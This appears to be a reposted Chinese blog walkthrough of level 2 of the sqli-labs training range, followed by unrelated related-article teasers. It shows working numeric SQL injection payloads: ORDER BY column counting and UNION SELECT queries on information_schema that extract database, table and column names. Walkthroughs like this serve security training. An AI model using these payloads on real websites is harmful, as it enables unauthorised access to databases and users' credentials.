web——sqliabs靶场——第二关

web——sqliabs靶场——第二关

news/2024/12/29 8:38:04/文章来源:https://blog.csdn.net/2301_80905479/article/details/143613000

今天来搞第二关，来看看是什么咸蛋

1.判断是否存在sql注入漏洞

输入1'

存在sql注入，报错语句为

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1

和第一关的报错语句相比

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

这两个语句的区别

第二句错误发生在 ''1'' 部分，也就是在 1 的前后有多余的引号。通常在 SQL 中，字符串应该被单引号 ' 包裹，而在这个错误中，1 被包裹在了两对单引号中：''1''。

第一句的错误发生在 '' 部分，也就是 SQL 查询中某个地方用单引号包裹了一个空字符串。空字符串（''）作为查询条件可能是导致错误的原因。通常在 SQL 查询中使用空字符串时，除非有特定的需求，否则应避免使用空字符串作为条件。

2.判断sql注入漏洞的类型

1.数字型判断

/?id=1 and 1=1

/?id=1 and 1=2

是数字型判断

3.判断它的字段数

/?id=1 order by 1-++

/?id=1 order by 2-++

/?id=1 order by 3-++

/?id=1 order by 4-++

还是只有三个字段

爆出显示位

/?id=-1 union select 1，2，3 --+

一定要-1，不然后面的语句不执行

如果 id 参数传入 -1，并且数据库表格没有 id = -1 的记录（比如用户表中的 id 都是正整数），那么这个查询会返回空结果。这时，如果攻击者进一步利用 UNION 操作来连接其他查询，可能绕过原始的查询结果返回机制。

可以看到是第二列和第三列里面的数据是显示在页面的

开始判断库名

/?id=-1 union select 1,database(),version()--+

数据库还是security

判断表名

/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'

开始爆users的列名

/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

开始爆username和password里的数据

结束

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.rhkb.cn/news/468476.html

如若内容造成侵权/违法违规/事实不符，请联系长河编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

时序预测 | Python基于CNN-transformer时间序列预测

时序预测 | Python基于CNN-transformer时间序列预测

时序预测 | Python基于CNN-transformer时间序列预测目录时序预测 | Python基于CNN-transformer时间序列预测预测效果基本介绍参考资料预测效果基本介绍时序预测 | Python基于CNN-transformer时间序列预测 Cnn-transformer-自适应稀疏自注意力ASSA-对比归一化contranorm预…

阅读更多...

windows中docker安装redis和redisinsight记录

windows中docker安装redis和redisinsight记录

创建一个Redis运行容器，命令如下 docker run -it -d --name redis -p 6379:6379 redis --bind 0.0.0.0 --protected-mode no -d 代表Redis容器后台运行 --name redis 给创建好的容器起名叫redis -p 6379:6379 将容器的6379端口映射到宿主机的6379端口，注…

阅读更多...

ClickHouse创建账号和连接测试

ClickHouse创建账号和连接测试

在之前搭建ClickHouse的时候，把账户相关的去掉了，所以登录和连接的时候是不需要账号密码的，但是实际项目中，肯定是需要根据需要创建账号。一，创建账号 1，进入到 /etc/clickhouse-server， 编辑…

阅读更多...

基于微信小程序实现个人健康管理系统

基于微信小程序实现个人健康管理系统

作者主页：编程千纸鹤作者简介：Java领域优质创作者、CSDN博客专家、CSDN内容合伙人、掘金特邀作者、阿里云博客专家、51CTO特邀作者、多年架构师设计经验、多年校企合作经验，被多个学校常年聘为校外企业导师，指导学生毕业设计并参…

阅读更多...

基于python的天气数据采集与可视化分析，对20个城市的天气适宜出行度分析

基于python的天气数据采集与可视化分析，对20个城市的天气适宜出行度分析

摘要本项目旨在基于Python对20个城市的天气数据进行采集与可视化分析，以评估天气的适宜出行度。该分析通过四个主要指标进行量化，这些指标分别是天气状况良好率、空气质量优良率、气温适宜率和安全天气率。通过这些指标，我们能够有效地判断…

阅读更多...

YOLOv11实战宠物狗分类

YOLOv11实战宠物狗分类

本文采用YOLOv11作为核心算法框架，结合PyQt5构建用户界面，使用Python3进行开发。YOLOv11以其高效的特征提取能力，在多个图像分类任务中展现出卓越性能。本研究针对5种宠物狗数据集进行训练和优化，该数据集包含丰富的宠物狗图像样本…

阅读更多...

电信网关配置管理系统 upload_channels.php 文件上传致RCE漏洞复现

电信网关配置管理系统 upload_channels.php 文件上传致RCE漏洞复现

0x01 产品简介中国电信集团有限公司（英文名称“China Telecom”、简称“中国电信”）成立于2000年9月，是中国特大型国有通信企业、上海世博会全球合作伙伴。电信网关配置管理系统是一个用于管理和配置电信网络中网关设备的软件系统。它可以帮助网络管理员实现对网关设备的远…

阅读更多...

Halcon LED灯带检测分享

Halcon LED灯带检测分享

目录原图检出图示例代码函数说明代码原图检出图示例代码函数说明 LEDSensitivity : 0.6 LEDMinSize : 35 LEDMaxSize : 400 LEDMethod : 1 LEDType :1 LED (Image, LEDDefectTrans, LEDSensitivity, LEDMethod, LEDType, LEDMinSize, LEDMaxSize, R, G, B,…

阅读更多...

Pytest-Bdd-Playwright 系列教程（7）：使用测试代码生成辅助工具

Pytest-Bdd-Playwright 系列教程（7）：使用测试代码生成辅助工具

Pytest-Bdd-Playwright 系列教程（7）：测试代码生成辅助工具的使用前言一、代码生成辅助工具的设计思路1.1 功能概览1.2 适用人群二、如何使用 pytest-bdd 代码生成器三、代码生成器的实际应用场景3.1 初学者的学习和实践3.2 大规模功能测试3…

阅读更多...

【每日刷题】Day152

【每日刷题】Day152

【每日刷题】Day152 🥕个人主页：开敲🍉 🔥所属专栏：每日刷题🍍 🌼文章目录🌼 1. LCR 176. 判断是否为平衡二叉树 - 力扣（LeetCode） 2. 最大子矩阵_牛客题霸…

阅读更多...

【Linux】vmlinux、vmlinuz、zImage、bzImage 的区别

【Linux】vmlinux、vmlinuz、zImage、bzImage 的区别

vmlinux vmlinux 是静态链接的可执行文件，但是无法直接加载启动，并且是非压缩的。 zImage and bzImage zImage 和 bzImage 都是 linux 的镜像（image ），前者用于老系统，后者用于新系统，都采用了…

阅读更多...

MaxK B：基于 LLM 大语言模型的知识库问答系统！

MaxK B：基于 LLM 大语言模型的知识库问答系统！

推荐一个基于大模型的企业级知识库问答系统，支持管理企业知识库、对话问答、RAG 等功能。企业知识管理的智能化革新在数字化时代，知识管理对于企业的重要性不言而喻。 MaxK B是一个基于 LLM 大语言模型的知识库问答系统，正是为了解决这一挑…

阅读更多...

Spring Boot 集成JWT实现Token验证详解

Spring Boot 集成JWT实现Token验证详解

文章目录 Spring Boot 集成JWT实现Token验证详解一、引言二、JWT和Token基础1、什么是Token2、什么是JWT3、JWT的结构4、JWT的工作原理三、集成JWT1、引入JWT依赖2、创建Token工具类3、创建拦截器4、注册拦截器四、总结 Spring Boot 集成JWT实现Token验证详解一、引言在现…

阅读更多...

前端CSS3 渐变详解

前端CSS3 渐变详解

文章目录 CSS3 渐变详解一、引言二、CSS3 渐变基础1、线性渐变1.1、基本线性渐变1.2、改变渐变方向 2、径向渐变2.1、基本径向渐变2.2、设置径向渐变的中心三、高级渐变技巧1、重复渐变1.1、重复线性渐变1.2、重复径向渐变四、总结 CSS3 渐变详解一、引言在现代网页设计中…

阅读更多...

openpyxl处理Excel模板,带格式拷贝行和数据填入

openpyxl处理Excel模板,带格式拷贝行和数据填入

本文中用openpyxl操作Excell 模板,进行行拷贝和数据填充. 主要涉及单元格格式的拷贝,合并单元格的拷贝,行高和列宽的处理. 将模板表格分为三部分,头部,中间循环填充部分,尾部.模板参数中设置头部高度,循环部分高度,剩余为尾部. 拷贝时先拷贝填充头部 ,然后根据数据循环拷贝填…

阅读更多...

IEEE 1588：电信网络的精确时间协议 (PTP)

IEEE 1588：电信网络的精确时间协议 (PTP)

IEEE 1588：电信网络的精确时间协议 IEEE 1588 PTP 概述PTP 协议特征同步类型IEEE 1588 PTP 角色IEEE 1588 PTP 的工作原理PTP 设备类型PTP 消息类型事件消息一般信息 PTP 时钟类规范PTP 配置文件 https://www.techplayon.com/ieee-1588-precision-time-protocol-ptp…

阅读更多...

DataFrame

DataFrame

目录一、创建DataFrame二、Sql语法三、DSL语法四、RDD与DataFrame互相转换一、创建DataFrame 在SparkSql中SparkSession是创建DataFrame和执行Sql的入口，创建DataFrame有三种方式： 通过Spark的数据源进行创建从一个存在的RDD进行转换从Hive Tabl…

阅读更多...

Redis 高并发分布式锁实战

Redis 高并发分布式锁实战

目录环境准备一 . Redis 安装二：Spring boot 项目准备三：nginx 安装四：Jmeter 下载和配置案例实战优化一：加 synchronized 锁优化二：使用 redis 的 setnx 实现分布式锁优化三：使用 Lua 脚本…

阅读更多...

参数估计理论

参数估计理论

估计理论的主要任务是在某种信号假设下，估算该信号中某个参数（比如幅度、相位、达到时间）的具体取值。参数估计：先假定研究的问题具有某种数学模型， 如正态分布，二项分布，再用已知类别的学习样…

阅读更多...

[vulnhub] DarkHole: 2

[vulnhub] DarkHole: 2

https://www.vulnhub.com/entry/darkhole-2,740/ 端口扫描主机发现探测存活主机，185是靶机 # nmap -sP 192.168.75.0/24 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-08 18:02 CST Nmap scan report for 192.168.75.1 Host is up (0.…

阅读更多...

最新文章

推荐文章